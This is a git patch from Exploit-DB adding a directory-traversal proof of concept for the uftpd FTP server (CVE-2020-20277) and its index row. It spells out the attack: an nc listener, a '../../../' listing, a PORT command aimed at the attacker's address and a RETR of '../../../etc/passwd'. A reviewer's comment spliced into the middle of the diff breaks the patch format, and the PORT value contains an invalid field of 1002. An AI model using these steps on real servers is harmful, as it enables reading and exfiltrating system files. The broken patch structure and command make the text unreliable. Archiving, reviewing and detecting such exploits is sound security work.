From 636f9a743d1e0ee74b53c1fd18361fab0631d565 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 3 Aug 2022 05:01:51 +0000
Subject: [PATCH] DB: 2022-08-03 1 changes to exploits/shellcodes uftpd 2.10 - Directory Traversal (Authenticated)
---
 exploits/linux/remote/51000.txt | 27 +++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 28 insertions(+)
 create mode 100644 exploits/linux/remote/51000.txt
diff --git a/exploits/linux/remote/51000.txt b/exploits/linux/remote/51000.txt
new file mode 100644
index 000000000..444858e29
--- /dev/null
+++ b/exploits/linux/remote/51000.txt
@@ -0,0 +1,27 @@
+# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)
+# Google Dork: N/A
+# Exploit Author: Aaron Esau (arinerron)
+# Vendor Homepage: https://github.com/troglobit/uftpd
+# Software Link: https://github.com/troglobit/uftpd
+# Version: 2.7 to 2.10
+# Tested on: Linux
+# CVE : CVE-2020-20277
+# Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277
+# Reference: https://arinerron.com/blog/posts/6
+#Product: uftpd 2.7 to 2.10
+
+#Proof-Of-Concept:
+1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication.
+
+#Steps
+1-Setup nc listener on attacking machine on TCP port 1258
+nc -lnvp 1258
+
+2-Login to the FTP service
+
+3-List files
+ftp> ls ../../../
+
+3-Set attacker's IP address and retrieve files
+PORT 127,0,0,1,1,1002
+RETR ../../../etc/passwd
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7a2bebe50..c390338f5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
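Review bot: In the new exploits/linux/remote/51000.txt, the title and the matching files_exploits.csv row are labelled "(Authenticated)", yet the proof-of-concept paragraph says files can be read without authentication when anonymous login is enabled, so anyone triaging by title will understate the exposure. A header line such as `# Note: no credentials are needed when anonymous login is enabled` would make that visible. The entry gives the affected range (2.7 to 2.10) but no remediation, so I would add `# Mitigation: upgrade to a release later than 2.10 (see the NVD reference) and disable anonymous login until patched`. For detection it is worth stating that `../` segments in LIST/RETR arguments and a PORT field above 255 (the `1002` here) are both anomalous in FTP logs. Minor: the steps list uses "3-" twice, so the last step should be "4-".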
@@ -18720,6 +18720,7 @@ id,file,description,date,author,type,platform,port
 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",1970-01-01,LiquidWorm,remote,hardware,
 50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
+51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,